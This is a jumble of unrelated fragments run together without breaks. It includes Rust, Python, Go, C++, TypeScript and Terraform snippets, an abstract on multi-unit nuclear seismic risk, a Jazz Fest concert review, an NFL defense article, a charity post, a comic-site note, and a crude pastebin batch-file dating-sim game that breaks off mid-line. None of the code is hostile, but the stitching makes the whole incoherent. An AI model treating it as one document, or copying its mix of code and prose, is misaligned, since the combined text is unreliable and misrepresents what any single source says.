<gh_stars>0 use crate::repos::shared::repo::DeleteResult; use nettu_scheduler_domain::{Entity, Meta, ID}; use std::sync::Mutex; use super::query_structs::MetadataFindQuery; /// Useful functions for creating inmemory repositories pub fn insert<T: Clone>(val: &T, collection: &Mutex<Vec<T>>) { let mut collection = collection.lock().unwrap(); collection.push(val.clone()); } pub fn save<T: Clone + Entity + std::fmt::Debug>(val: &T, collection: &Mutex<Vec<T>>) { let mut collection = collection.lock().unwrap(); for i in 0..collection.len() { if collection[i].id() == val.id() { collection.splice(i..i + 1, vec![val.clone()]); } } } pub fn find<T: Clone + Entity>(val_id: &ID, collection: &Mutex<Vec<T>>) -> Option<T> { let collection = collection.lock().unwrap(); for i in 0..collection.len() { if collection[i].id() == val_id { return Some(collection[i].clone()); } } None } pub fn find_by<T: Clone + Entity, F: FnMut(&T) -> bool>( collection: &Mutex<Vec<T>>, mut compare: F, ) -> Vec<T> { let collection = collection.lock().unwrap(); let mut items = vec![]; for item in collection.iter() { if compare(item) { items.push(item.clone()); } } items } pub fn delete<T: Clone + Entity>(val_id: &ID, collection: &Mutex<Vec<T>>) -> Option<T> { let mut collection = collection.lock().unwrap(); for i in 0..collection.len() { if collection[i].id() == val_id { let deleted_val = collection.remove(i); return Some(deleted_val); } } None } pub fn delete_by<T: Clone + Entity, F: Fn(&T) -> bool>( collection: &Mutex<Vec<T>>, compare: F, ) -> DeleteResult { DeleteResult { deleted_count: find_and_delete_by(collection, compare).len() as i64, } } pub fn find_and_delete_by<T: Clone + Entity, F: Fn(&T) -> bool>( collection: &Mutex<Vec<T>>, compare: F, ) -> Vec<T> { let mut collection = collection.lock().unwrap(); let mut deleted_items = vec![]; for i in (0..collection.len()).rev() { let index = collection.len() - i - 1; if compare(&collection[index]) { let deleted_item = collection.remove(index); deleted_items.push(deleted_item); } } deleted_items } pub fn update_many<T: Clone + Entity, F: Fn(&T) -> bool, U: Fn(&mut T)>( collection: &Mutex<Vec<T>>, compare: F, update: U, ) { let mut collection = collection.lock().unwrap(); for i in 0..collection.len() { let index = collection.len() - i - 1; if compare(&collection[index]) { update(&mut collection[index]); } } } /// Ignores skip and limit as this is just used for testing pub fn find_by_metadata<T: Clone + Entity + Meta>( collection: &Mutex<Vec<T>>, query: MetadataFindQuery, ) -> Vec<T> { let skip = query.skip; let mut skipped = 0; let limit = query.limit; let mut count = 0; find_by(collection, |e| { match e.metadata().get(&query.metadata.key) { Some(value) if *value == query.metadata.value && *e.account_id() == query.account_id => { if skip > skipped { skipped += 1; false } else if count == limit { false } else { count += 1; true } } _ => false, } }) }
def clear_notification( loop: Union[urwid.MainLoop, urwid.main_loop.EventLoop], data: Any ) -> None: widgets.notifications.contents.pop() loop.remove_alarm(_alarms.get())
def update(self, update_values: Dict[str, List[float]]) -> None: for metric_name, metric_values in update_values.items(): getattr(self, metric_name).update(metric_values)
Bringing Schemas to the Schemaless Ad-hoc spreadsheets can be appealing for managing some kinds of scientific data, but they allow bad practices like inconsistent types (e.g., string, integer, decimal) within individual columns, as well as open-ended categorical values (e.g., cell shapes). We have developed tools that infer LinkML schemas from spreadsheets, asserting types and enumerated lists that can be used to validate the dataset as it grows. Our tools can also associate OBO Foundry term identifiers with an enumeration’s permissible values in the spirit of interoperability.
Voice of the Wetlands All-Stars 04/25/2010 Nola Jazzfest, New Orleans, LA Set: Bayou Breeze, Lousiana Sunshine, Lonely Lonely Nights, Ya-Ya, Poor Man’s Paradise, The Things that I Used To Do, Band Intros, Me Donkey Want Water, Make A Good Gumbo Bluesman Tab Benoit founded this Louisiana super-group in 2004 to raise awareness of the disappearing Louisiana coastline. This set was recorded 5 days after the Deepwater Horizon blew up, before anyone knew exactly how bad that event would really be. Voice of the Wetlands All-Stars Tab Benoit – guitar & vocals Cyril Neville – percussion & vocals Dr. John – keys and vocals Anders Osborne – guitar & vocals George Porter Jr. – bass & vocals Johnny Vidacovich – drums Johnny Sansone – harmonica, accordion, & vocals Special Guests: Big Chief Monk Boudreaux – vocals Stanton Moore – drums Allen Toussaint – piano For more on Benoit’s Voice of the Wetlands foundation and how you can contribute to relief efforts in the Gulf of Mexico, click here: http://www.voiceofthewetlands.org/ Take the jump for pictures from the show and read a review from www.nola.com. Voice of the Wetlands rings out loud at New Orleans Jazz Fest The first two songs performed by the Voice of the Wetlands All-Stars today could have doubled as a recap of the weather report from Jazz Fest’s first weekend. To open, Tab Benoit and Cyril Neville traded verses on “Bayou Breeze,” whose chorus goes, “don’t let the water wash us away;” then, Neville took the lead on “Louisiana Sunshine.” The crowd was large and the mood was as sunny as the weather – the knee-deep moat that had surrounded the Acura Stage Friday and Saturday had even dried up enough for fans to stretch out in the grass where it had been. The VOW All-Stars are a supergroup, to put it mildly, and for most of the set, the band switched up who took the lead to give each star his chance to shine. Dr. John recalled Earl King’s “Lonely Lonely Nights” (which he’s recorded himself) on “Weary Silent Night.” Anders Osborne, looking a bit Billy Gibbons there with his caveman beard and rocker shades, wailed ed on guitar. The full effect of what can be done when talents that sizable work together started to reveal itself when Jumpin’ Johnny Sansone put down his harmonica and picked up an accordion for his own “Poor Man’s Paradise,” given Latin flavor with a cha-cha beat from Johnny Vidacovich and steel drums and cowbell from Neville. Galactic drummer Stanton Moore then relieved Vidacovich, hitting the stage with Big Chief Monk Boudreaux (Moore backed Boudreaux with Indian rhythms before, on Galactic’s 2007 release “From The Corner To The Block.”) Then Cyril Neville stepped out from behind his percussion rig to wail, Guitar Slim-style, on a plaintive, no-holds-barred blues with almost as much muscle as “The Things that I Used To Do.” All of the Allstar’s songs are Louisiana topical, natch, but nothing preceding it got as much of a whoop from the crowd as “When I go to New Orleans/ I go straight to the 6th Ward… to Ernie K-Doe’s Mother-In-Law Lounge.” All bets were off when Allen Toussaint, in a crisp cream suit, took the stage for the finale, the zydeco-flavored rocker “Make A Good Gumbo.” After what looked like a brief chat with Dr. John (maybe, “Do you want the organ or the baby grand?”) Toussaint ripped into a wild boogie-woogie. Benoit, who’d played support up until then, stepped to the mic to lead the formidable crew. Everywhere you looked on the packed stage, a major Louisiana star was shredding – and wearing a face-splitting grin. Share this: Reddit Like this: Like Loading... Related Posted in General Information, Music to Purchase, Download, or Stream, Show Reviews Tags: Allen Toussaint, Anders Osborne, Big Cheif Monk Boudreaux, Cyril Neville, Deepwater Horizon, Dr. John, George Porter Jr. Johnny Vidacovich, Gulf of Mexico, JazzFest, Johnny Sansone, Louisiana, New Orleans, oil spill, Stanton Moore, Tab Benoit, Voice of the Wetland's All-Stars
<filename>terrascript/resource/oktadeveloper/oktaasa.py # terrascript/resource/oktadeveloper/oktaasa.py # Automatically generated by tools/makecode.py (24-Sep-2021 15:23:27 UTC) import terrascript class oktaasa_assign_group(terrascript.Resource): pass class oktaasa_create_group(terrascript.Resource): pass class oktaasa_enrollment_token(terrascript.Resource): pass class oktaasa_project(terrascript.Resource): pass __all__ = [ "oktaasa_assign_group", "oktaasa_create_group", "oktaasa_enrollment_token", "oktaasa_project", ]
#include "SocketHandler.h" Socket SocketHandler::CreateUDPSocket(unsigned short portno) { int sockfd = socket(AF_INET, SOCK_DGRAM, 0); struct sockaddr_in serveraddr; bzero((char *) &(serveraddr), sizeof(serveraddr)); serveraddr.sin_family = AF_INET; serveraddr.sin_addr.s_addr = htonl(INADDR_ANY); serveraddr.sin_port = htons(portno); if(bind(sockfd, (struct sockaddr *) &(serveraddr), sizeof(serveraddr)) < 0) { printf("SocketHandler::CreateUDPSocket:\tERROR on binding to port %i \n", portno); } int optval = 1; setsockopt(sockfd, SOL_SOCKET, SO_REUSEADDR,(const void *)&optval, sizeof(int)); return sockfd; } Socket SocketHandler::CreateUDPSocketNOPORT() { int sockfd = socket(AF_INET, SOCK_DGRAM, 0); int optval = 1; setsockopt(sockfd, SOL_SOCKET, SO_REUSEADDR,(const void *)&optval, sizeof(int)); return sockfd; } Socket SocketHandler::CreateTCPSocketCLIENT() { int sockfd = socket(AF_INET, SOCK_STREAM, 0); int optval = 1; setsockopt(sockfd, SOL_SOCKET, SO_REUSEADDR,(const void *)&optval, sizeof(int)); return sockfd; } Socket SocketHandler::CreateTCPSocketSERVER(unsigned short portno) { int sockfd = socket(AF_INET, SOCK_STREAM, 0); struct sockaddr_in server; bzero((char *) &(server), sizeof(server)); server.sin_family = AF_INET; server.sin_addr.s_addr = htonl(INADDR_ANY); server.sin_port = htons(portno); if(bind(sockfd, (struct sockaddr *) &(server), sizeof(server)) < 0) { printf("SocketHandler::CreateTCPSocketSERVER:\tERROR on binding to port %i\n", portno); } listen(sockfd, 5); int optval = 1; int returned = setsockopt(sockfd, SOL_SOCKET, SO_REUSEADDR, (const void *)&optval, sizeof(int)); return sockfd; } int SocketHandler::FilloutSocketAddress(SocketAddress* serveraddr, char* hostname, short portno) { struct hostent *server = gethostbyname(hostname); if(server == NULL) { printf("SocketHandler::FilloutSocketAddress: Couldn't get host address of \"%s\"\n", hostname); switch(h_errno) { case HOST_NOT_FOUND: {printf("\tHOST_NOT_FOUND (The specified host is unknown.)\n"); break;} case NO_ADDRESS: {printf("\tNO_ADDRESS or NO_DATA (The requested name is valid but does not have an IP address.)\n"); break;} case NO_RECOVERY: {printf("\tNO_RECOVERY (A nonrecoverable name server error occurred.)\n"); break;} case TRY_AGAIN: {printf("\tTRY_AGAIN (A temporary error occurred on an authoritative name server. Try again later.)\n"); break;} } return h_errno; } bzero((char *) serveraddr, sizeof(sockaddr_in)); serveraddr->sin_family = AF_INET; bcopy((char *)server->h_addr, (char *)&(serveraddr->sin_addr.s_addr), server->h_length); serveraddr->sin_port = htons(portno); return 0; } int SocketHandler::TCPConnectToServer(Socket sockfd, SocketAddress* where) { int returned = connect(sockfd, (const sockaddr*) where, sizeof(SocketAddress)); if(returned == -1) { printf("SocketHandler::TCPConnectToServer:\t%s\n", strerror(errno)); } return returned; } Socket SocketHandler::TCPWaitForClient(Socket sockfd, SocketAddress* where) { int sizeofstruct = sizeof(SocketAddress); int returned = accept(sockfd, (sockaddr*) where, (socklen_t*) &sizeofstruct); return returned; } int SocketHandler::TCPSend(Socket sockfd, void* data, int length) { int returned = send(sockfd, data, length, 0); } int SocketHandler::UDPSend(Socket sockfd, void* data, int length, SocketAddress* where) { int returned = sendto(sockfd, data, length, 0, (const sockaddr*)(where), sizeof(sockaddr)); return returned; } int SocketHandler::Recv(Socket sockfd, void* where, int length) { int size = recv(sockfd, where, length, 0); return size; } int SocketHandler::SetTimeout(Socket sockfd, int microseconds, int seconds) { struct timeval time; time.tv_sec = seconds; time.tv_usec = microseconds; return setsockopt(sockfd, SOL_SOCKET, SO_RCVTIMEO, &time, sizeof(time)); } int SocketHandler::RecvFromWho(Socket sockfd, void* where, int length, SocketAddress* who) { unsigned int wholength = sizeof(sockaddr_in); return recvfrom(sockfd, where, length, 0, (sockaddr*) who, &wholength); } int SocketHandler::PeekRecv(Socket sockfd, void* where, int length) { return recv(sockfd, where, length, MSG_PEEK); } #define PingSpeed 100 * 1000 /* Microseconds */ void SocketHandler::SendPingsToWhere(Socket sockfd, SocketAddress* where) { char c = 42; SetTimeout(sockfd, 1); while(true) { UDPSend(sockfd, &c, sizeof(c), where); int status = Recv(sockfd, &c, sizeof(c)); if(status > 0) return; //usleep(UDPPingSpeed); } } void SocketHandler::WaitForPingsFromWho(Socket sockfd, SocketAddress* sa) { SetTimeout(sockfd, 0); char c; int status = -1; while(status < 0) { status = RecvFromWho(sockfd, &c, sizeof(c), sa); } UDPSend(sockfd, &c, sizeof(c), sa); } void SocketHandler::CloseSocket(Socket s) { shutdown(s, SHUT_RDWR); close(s); }
def log_timeout(self, log_topics): values = [] for topic in log_topics: values.append((self.get_topic_name(topic), self.last_seen.get(topic))) c = self.connection.cursor() c.executemany( "INSERT INTO topic_log (topic, last_seen_before_timeout) " "VALUES (?, ?)", values) c.close() self.connection.commit()
Incorporation of the Radioactive Interinfluence in Multi-Unit Seismic PRA Kashiwazaki-Kariwa nuclear power station of TEPCO is the largest nuclear power station in the world, and it has seven nuclear power plants. As the experience at Fukushima Daiichi nuclear power station accident in March 2011 involving concurrent core damage at multiple units, it is considered that the risk derived from hazards of Earthquakes and Tsunamis is relatively significant in Japan, and these events have a high likelihood of damaging multiple units simultaneously. Therefore, it is very important to grasp the multi-unit specific risk. Although there are some unique accident scenarios of Multi-Unit PRA, this paper focuses on the influence of radioactive materials released outside the containment vessel on the accident management of the adjacent unit. The events including core damage and loss of containment function should be considered as the causes of the release of radioactive substances, and operator’s operation or the like should be considered as objects to be adversely affected by them. It is necessary to incorporate that into PRA to confirm the effect on risk. It is very difficult in terms of the maturity of evaluation method and the calculation load to accurately incorporate consequences derived from time series of various events and complicated interaction into PRA model. Therefore, as the first step in evaluating the risk of influence of radioactive material release on the accident management, some streamlining efforts are implemented according to the purpose. For example, Kashiwazaki-Kariwa unit 6 and unit 7 were set as the target units for model simplification. We also assume the earthquake as the initiating event due to the strong common factor for multi units. Whether or not to be operable in the adjacent plant is set conservatively based on deterministic evaluation. PRA taking into consideration the radiation influence by multi-unit accident is compared with normal PRA. Some kind of Core Damage Frequency (CDF) such as CDF1 (Core Damage Frequency at which the damage of one or the other of two unit occur), CDF2 (CDF at which the damage of both of units occur) and CDFTOTAL (CDF at which the damage of one or more units occur: CDF1 + CDF2) are quantified, and the degree of this issue is provided. Although the change of CDFTOTAL was insignificant, the necessity of further study was shown from the viewpoint of the amount and timing of radioactive substance released due to an approximately 1.5-fold increase in CDF2.
About We are three IT professionals with experience in programming, server management, storage, security, networking, web hosting, car audio installs, food preparation and restaurant management. We would like to start a buisness in Boston where IT professionals, students and anyone interested in technology can come together to work, receive help, eat, relax and network with others that share the same interests. In addition, we will provide video gaming space, movie space and recreation space. We vision technology themed rooms and environments with workspaces, meeting rooms, cubicles and just about any set up an IT person would desire. We will also have food and refreshments available, host events such as vendor days, professional days for potential employment and college open houses for potential students. In addition to these events, we will hold classes to help anyone interested in learning technology topics. In conclusion, we want to create a great place for all who enjoy technology. We want to make a central hub in the Boston area where people can come to relax, get things done and build a network.
Through five games, it’s been a struggle defensively for the Los Angeles Rams. Outside of facing an abysmal Colts offense in Week 1, and limiting the Seahawks to just 241 total yards on Sunday, the Rams’ defense has not been good. It ranks 23rd in points and 20th in yards allowed, while the offense is second and fifth in those departments, respectively. So what’s been the biggest culprit in the Rams’ defensive struggles? Stopping the run, which they’ve been unable to do. Despite the fact that Seattle only rushed for 62 yards on 25 attempts, the Rams are still one of the worst teams when it comes to playing the run. After five games, Los Angeles has surrendered 668 yards on 148 attempts, an average of 4.5 yards per carry. That’s a half-yard more than the Rams are averaging per carry on offense, which is troublesome. No team in the NFL has allowed more rushing touchdowns than the Rams (seven), and only five have given up more yards on the ground. Remember, this is all after they shut down the Seahawks, which means Los Angeles ranked even further down the list prior to Week 5. On the bright side, it’s good to see the Rams are improving in that department, even if it was against a team with a terrible running game and an even worse offensive line. One week after allowing the Cowboys to rush for 189 yards, the Rams clogged up running lanes with the likes of Aaron Donald and Michael Brockers. Mark Barron and Alec Ogletree have also played better in recent weeks, too. Barron led the team with 15 tackles on Sunday, making one of the Rams’ six tackles for loss on the day. If Los Angeles can continue to improve its run defense, the entire unit will begin to play better. That’ll be a challenge this week with the NFL’s second-leading rusher, Leonard Fournette, likely carrying it 25 times on Sunday.
/** Maps a RevCommit object to a VcsCommit object. */ public class RevCommitMapper { public static Commit map(RevCommit revCommit) { Commit commit = new Commit(); commit.setName(revCommit.getName()); commit.setAuthor(revCommit.getAuthorIdent().getName()); commit.setComment(revCommit.getShortMessage()); commit.setTimestamp(new Date(revCommit.getCommitTime())); return commit; } }
<gh_stars>0 import { Layout } from "antd"; import { NormalizedCacheObject } from "apollo-cache-inmemory"; import ApolloClient from "apollo-client"; import cookie from "cookie"; import Link from "next/link"; import { MouseEvent, PureComponent } from "react"; import * as React from "react"; import { redirect } from "../../utils"; import style from "./Header.scss"; interface IProps { name: string; client: ApolloClient<NormalizedCacheObject>; } export default class Header extends PureComponent<IProps> { public render() { return ( <Layout.Header className={style.container}> <Link href="/" prefetch={true}> <div className={style.logo}>Mobile Payment</div> </Link> <div className={style.welcome}> <span>Hello {this.props.name}</span>,{" "} <a href="#" onClick={this.logout}> log out </a> </div> </Layout.Header> ); } private logout = (e: MouseEvent) => { e.preventDefault(); document.cookie = cookie.serialize("token", "", { maxAge: -1 // Expire the cookie immediately }); // Force a reload of all the current queries now that the user is // logged in, so we don't accidentally leave any state around. this.props.client.cache.reset().then(() => { // Redirect to a more useful page when signed out redirect("/login"); }); }; }
<filename>src/clustering.py import numpy as np from sklearn.cluster import MiniBatchKMeans # # Constants # kmeans_batch_size = 100 n_clusters = 32 # # HSL <> HHSL methods # def hcos_hsin_to_h(hh_array): h_array = [] for i in range(hh_array.shape[0]): cosinus = hh_array[i][0] sinus = hh_array[i][1] original = np.arccos(cosinus) if (sinus < 0): original = (2 * np.pi) - original original = original / (2 * np.pi) h_array.append(original) return np.array(h_array).reshape(-1, 1) def hhsl_to_hsl(colors): h = hh_cluster_centers_to_h_cluster_centers(colors[:,0:2]) s = colors[:,2].reshape(-1, 1) v = colors[:,3].reshape(-1, 1) return np.hstack((h, s, v)) def hsl_to_hhsl(hsl_colors): cos_h = np.cos(2 * np.pi * hsl_colors[:,0]) sin_h = np.sin(2 * np.pi * hsl_colors[:,0]) hh_colors = np.vstack((cos_h, sin_h)).T # scale the size of the hh circle with the lightness for a bicone shape hh_colors = 2 * np.multiply(hh_colors, (0.5 - np.abs(0.5 - hsl_colors[:,2])).reshape(-1, 1)) return np.vstack((hh_colors[:,0], hh_colors[:,1], hsl_colors[:,1], hsl_colors[:,2])).T def hh_cluster_centers_to_h_cluster_centers(hh_centers): circular_hue_center_radii = np.sqrt(np.multiply(hh_centers[:,0], hh_centers[:,0]) + np.multiply(hh_centers[:,1], hh_centers[:,1])) circular_hue_center_radii = np.reshape(circular_hue_center_radii, (-1, 1)) norm_circular_hue_centers = hh_centers / np.clip(circular_hue_center_radii, 0.000000000001, 1) norm_circular_hue_centers = np.clip(norm_circular_hue_centers, -1, 1) return hcos_hsin_to_h(norm_circular_hue_centers) # TODO maybe get a measure for how representative the clusters are for the set and prune the ones that score lower? def hhsl_cluster_centers_as_hsl(hsl_colors): kmeans_model_hhsl = MiniBatchKMeans(n_clusters = n_clusters, batch_size = kmeans_batch_size) kmeans_hhsl = kmeans_model_hhsl.fit(hsl_to_hhsl(hsl_colors)) labels = kmeans_hhsl.labels_ return hhsl_to_hsl(kmeans_hhsl.cluster_centers_) def hsl_cluster_centers(hsl_colors): kmeans_model_hsl = MiniBatchKMeans(n_clusters = n_clusters, batch_size = kmeans_batch_size) kmeans_hsl = kmeans_model_hsl.fit(hsl_colors) return kmeans_hsl.cluster_centers_
SecondLie wants you to hate cancer. SecondLie, the premier Second Life Twitter parody account, is raising money for cancer research as a part of the broader Relay For Life campaign. If you’re a Second Life user, click the ‘love’ button on SecondLie’s post by the end of the month, and he (and 19 others) will donate one cent each towards cancer research. That’s currently 20 cents each time someone clicks, up to a limit of 10,000 loves on the post. (UPDATE: Now 40 US cents per love) Hating cancer requires nothing from you, other than a mouse-click. Surely, you can hate cancer enough to lift one finger. Actually, even if you hate SecondLie more than you hate cancer, you can add your love to the post and cost him some money. So, win-win, right? Share this: Twitter Google Facebook Reddit Tumblr More LinkedIn Pocket Pinterest Print Tags: Cancer, Health, Relay For Life, Second Life, SecondLie
<gh_stars>0 import json import pandas as pd def save_to_csv(filename): with open(f'{filename}_match_data.txt', 'r') as f: data = f.read() new_data = [] for elem in data.split('\n'): string = elem.replace("'", "\"") try: new_data.append(json.loads(string)) except Exception: pass dataframe = pd.DataFrame(new_data) dataframe.to_csv(f'{filename}.csv', index=False)
Don’t get me wrong, I’m sure there is a valid reason why Cyclops and Wolverine are going at it in the newly released image for X-men: Schism, but in my heart of hearts, I like to think that Hannah Montana had something to do with it. Even if it’s a little part. Today’s Best-of-Friends page was done by Guy Allen, whose new portfolio site is now up and running: Guy Allen is an illustrator/ designer working professionally in the field for over 4 years. A graduate of the College for Creative Studies in Detroit, MI, Guy majored in Illustration, while simultaneously having “on the side” relationships with Industrial and Graphic Design. Guys past work can be seen in many places including print, web and too many commercials to count; from automotive to baked beans commercials , Guy has done them all and has a client list to prove it. Enjoy new comic day, folks, we’ll see you back here on Friday. -sohmer
package main import ( "net/http" "github.com/gorilla/mux" ) func enableCors(w http.ResponseWriter) { headers := w.Header() headers.Add("Access-Control-Allow-Origin", "*") headers.Add("Vary", "Origin") headers.Add("Vary", "Access-Control-Request-Method") headers.Add("Vary", "Access-Control-Request-Headers") headers.Add("Access-Control-Allow-Headers", "Content-Type, Origin, Accept, token") headers.Add("Access-Control-Allow-Methods", "GET, POST,OPTIONS") } //InitRestHandler Supported REST route handing func InitRestHandler(g *Game) { prefix := "rest" router := mux.NewRouter() router.PathPrefix(prefix) router.HandleFunc("/"+prefix+"/health", func(w http.ResponseWriter, r *http.Request) { enableCors(w) w.WriteHeader(http.StatusOK) w.Write([]byte("Service Online")) }).Methods("GET") router.HandleFunc("/"+prefix+"/player/register/", func(w http.ResponseWriter, r *http.Request) { enableCors(w) registerPlayerHandler(w, r, g) }).Methods("POST") router.HandleFunc("/"+prefix+"/player/unregister/", func(w http.ResponseWriter, r *http.Request) { enableCors(w) unregisterPlayerHandler(w, r, g) }).Methods("POST") router.Methods("OPTIONS").HandlerFunc(func(w http.ResponseWriter, r *http.Request) { enableCors(w) w.WriteHeader(http.StatusOK) return }) http.Handle("/", router) } type _RegisterPlayerBody struct { Name string `json:"name"` } type _RegisterPlayerResponse struct { ID string `json:"id"` PseudoID string `json:"pseudoID"` } func registerPlayerHandler(w http.ResponseWriter, req *http.Request, g *Game) { var body _RegisterPlayerBody if err := ReadBytesFromBody(req.Body, &body); err != nil { SendErrorResponse(w, err) return } name := body.Name if _, err := IsStringEmpty(name); err != nil { SendErrorResponse(w, err) return } id, err := CreatePlayerID(name) if err != nil { CatchError("Unable to register new player", err) SendErrorResponse(w, err) return } var isExisting = make(chan bool) g.hasPlayer <- PlayerExistsMessage(id, isExisting) if r := <-isExisting; r == true { SendErrorResponse(w, NewError("Player already exists")) return } pseudoID, err := CreatePseudoPlayerID(id) if err != nil { SendErrorResponse(w, NewError("Player already exists")) return } g.send <- AddPlayerMessage(id, pseudoID, name) SendResponse(w, _RegisterPlayerResponse{ ID: id, PseudoID: pseudoID, }) } func unregisterPlayerHandler(w http.ResponseWriter, req *http.Request, g *Game) { var body _RegisterPlayerResponse if err := ReadBytesFromBody(req.Body, &body); err != nil { SendErrorResponse(w, err) return } var id = body.ID if _, err := IsStringEmpty(id); err != nil { SendErrorResponse(w, err) return } g.send <- RemovePlayerMessage(id) SendResponse(w, nil) }
Generic Dating Sim 2000 V0.0.1 gamesinabit Nov 4th, 2014 225 Never 225Never Not a member of Pastebin yet? Sign Up , it unlocks many cool features! rawdownloadcloneembedreportprint Batch 7.59 KB @ echo off title GDS2000 color 70 set /a days=0 set /a endingsunlocked=0 set /a peoplemet=0 set /a friends=0 echo ----------------------------------------- echo ---------GENERIC DATING SIM 2000--------- echo -----------by nobody important----------- echo ----------------------------------------- pause cls goto : menu : menu cls echo MAIN MENU echo --------- echo Type 'Play' to play echo Type 'Close' to close the window echo Type 'Continue' to access the password screen set /p input= if % input % ==Play goto : tutorialorgame if % input % ==play goto : tutorialorgame if % input % ==Close exit if % input % ==close exit if % input % ==Continue goto : password if % input % ==continue goto : password if not % input % ==no goto : error : error cls echo COMMAND INCORRECT pause cls echo RETURNING TO MENU pause goto : menu : password cls set /p pass=Enter the password: if % pass % ==upupdowndownleftrightleftrightbastart goto : konamicode if % pass % ==upupdowndownleftrightleftrightBAstart goto : konamicode if % pass % ==uuddlrlrbastart goto : konamicode if % pass % ==uuddlrlrBAstart goto : konamicode if % pass % ==F5redA6red goto : tobeadded if % pass % ==lelbot goto : freakedn1PASS if not % pass % ==none goto : wrongpass : wrongpass cls echo That's an incorrect password. echo Returning to the main menu. pause goto : menu : tobeadded cls echo GENERIC DATING SIM 2000 IS STILL IN DEVELOPMENT, SO SOME SECTIONS OF THE GAME ARE GOING TO BE AVALIBLE IN FUTURE VERSIONS. pause cls echo RETURNING TO THE MAIN MENU pause goto : menu : konamicode cls pause echo ... pause cls echo What did you expect? A fucking fanfare? echo Too bad, this can't transmit sound. pause cls echo Anyway, this will alter some stuff ingame, so enter: echo "F5redA6red" at the password screen pause cls echo RETURNING TO THE MENU pause goto : menu : tutorialorgame cls echo Would you like to see the tutorial? set /p tutyn=Y/N? if % tutyn % ==Y goto : tutorial if % tutyn % ==N goto : day0 if % tutyn % ==y goto : tutorial if % tutyn % ==n goto : day0 : tutorial cls echo In GDS2000, you will be asked to enter a letter or word in order to progress. echo When this section comes up, you must enter exactly what it asks you to enter for your desired option. pause cls echo If you enter an answer that wasn't made to progress the story, you will be sent to a screen like this: pause cls goto : errortutorial : errortutorial cls echo COMMAND INCORRECT pause cls echo RETURNING TO [section] pause goto : tutorial2 : tutorial2 cls echo Or some variation of that. pause cls echo There will be passwords throughout the game that are used to save progress such as: echo Number of days/nights echo Relationships echo Amount of endings unlocked echo etc. pause cls echo Please enjoy the game. pause goto : day0 : day0 cls set /p name=What is your name? cls color 71 echo --------???-------- echo % name %! pause cls set /a peoplemet+=1 echo --------lelbot420-------- echo Welcome to Weird Shit High ! echo I'll be your friend who you some how know. pause cls set /a friends+=1 echo --------lelbot420-------- echo In WSH, you'll encounter humans, birds, and gigantic monsters. echo I myself have had me boat rocked by Cthulhu if you know what I mean. pause cls color 72 set /a peoplemet+=1 echo --------Cthulhu-------- echo WHERE THE HELL HAVE YOU BEEN? pause cls color 71 echo --------lelbot420-------- echo WHY DOES IT MATTER TO YOU? IT'S NOT LIKE I'LL CHEAT ON YOU, NO MATTER HOW SMALL YOUR... pause cls color 70 echo As your human friend and his gargantuan lover begin to argue, you can't help but let your mind drift off. echo Where will you live? echo Who will you live with? echo Oh yeah, you got your own room. pause cls echo Some time passes... pause cls color 78 echo Some time... pause cls color 07 echo passes. pause goto : n1 : n1 cls set /a days+=1 echo ---TIME 10:00PM--- echo Type 'stats' to see your current statistics echo Type 'games' to select a video game to play echo Type 'food ' to make food echo Type 'club' to go to some club echo Type 'library' to go to the library set /p night1=What will you do on your first night here? if % night1 % ==stats goto : gamestatsn1 if % night1 % ==games goto : gamesnight1 if % night1 % ==food goto : foodnight1 if % night1 % ==club goto : clubnight1 if % night1 % ==library goto : librarynight1 if not % night1 % ==none goto : n1error : gamestatsn1 cls echo Endings unlocked: % endingsunlocked % echo Number of people met: % peoplemet % echo Days complete: % days % echo Friends: % friends % pause goto : n1 : n1error cls echo You either entered a non existing command on night 1, echo or entered an existing command wrong. pause cls echo Returning to night 1... pause goto : n1 : gamesnight1 cls echo You look at your selection... pause cls echo Type 'Lonk' to play Legend of Lonk: Ahcarono of Tim echo Type 'Sanic' to play Sanic the Heghoog 2016 echo Type 'TF2' to play Team Fortress 2 set /p gaming1=What will you play? if % gaming1 % ==Lonk goto : lonk1 if % gaming1 % ==Sanic goto : sanic1 if % gaming1 % ==TF2 goto : tf21 if not % gaming1 % ==nogame goto : n1error : tf21 cls echo There's no internet where you are for some reason. echo When you get up to check your router, you hear a knock on your door. pause goto : end1 : end1 cls echo You go to your dorm's door, but are feeling worried about what's on the other end. echo Will you echo Run? ( Type "Run" ) echo Open the door ( Type "Open" ) set /p end1input=What will you do ? if % end1input % ==Run goto : end1run if % end1input % ==Open goto : end1open if % end1input % ==error goto : end1error : end1error cls echo Apparently you didn't input a correct command. pause cls echo Returning to last screen... pause goto : end1 : end1run cls echo You attempt to move , but are frozen with fear. echo The door suddenly slams open with your friend standing on the other side is confused to see you staring with wide eyes. pause cls color 01 echo --------lelbot420-------- echo Are you okay, % name % ? pause cls color 07 echo "I'm just freaked out." ( type a1 ) echo "Y...yes." ( type a2 ) set /p end1r=What do you say? if % end1r % ==a1 goto : freakedn1 if % end1r % ==a2 goto : yesansn1 : freakedn1PASS cls set /p name=What's your name again? I forgot... cls echo Oh, that's right ! It's % name % ! pause goto : freakedn1 : freakedn1 cls color 01 echo --------lelbot420-------- echo Why? pause cls color 07 echo -------- % name % -------- echo I'm not sure. pause cls echo You are envoloped in darkness, and you feel every inch of it seeping into your skin. pause cls color 80 echo It̥ ͑hurts͢ pause cls color 08 echo Please͇ ̂ṡțo᷿p̍ ̚it̃ ! ̈ pause cls color 70 echo You got the ending: OUT OF NOWHERE FILLER ENDING set /a endingsunlocked+=1 echo Enter "OoNFE01restart" on the password screen to restart with this ending already unlocked ! pause goto : finalresults : sanic1 cls echo You go fast like Sanic. pause cls echo You realize it's getting pretty late, so you turn off your interactive furry experiance echo and go to bed. pause cls color 80 pause cls color 70 pause goto : day1nogame : lonk1 cls echo You put "Legend of Lonk: AoT" into your Nintendo 69. pause cls echo You're up pretty late... pause cls color 80 pause cls color 70 pause goto : day1nogame : day1nogame cls : foodnight1 : clubnight1 : librarynight1 : finalresults cls echo FINAL RESULTS FOR % name % echo ------------------------------ echo Chatacters met: % peoplemet % echo Endings unlocked so far: % endingsunlocked % echo Days completed: % days % pause cls echo Thank you for playing ! pause goto : menu RAW Paste Data @echo off title GDS2000 color 70 set /a days=0 set /a endingsunlocked=0 set /a peoplemet=0 set /a friends=0 echo ----------------------------------------- echo ---------GENERIC DATING SIM 2000--------- echo -----------by nobody important----------- echo ----------------------------------------- pause cls goto :menu :menu cls echo MAIN MENU echo --------- echo Type 'Play' to play echo Type 'Close' to close the window echo Type 'Continue' to access the password screen set /p input= if %input%==Play goto :tutorialorgame if %input%==play goto :tutorialorgame if %input%==Close exit if %input%==close exit if %input%==Continue goto :password if %input%==continue goto :password if not %input%==no goto :error :error cls echo 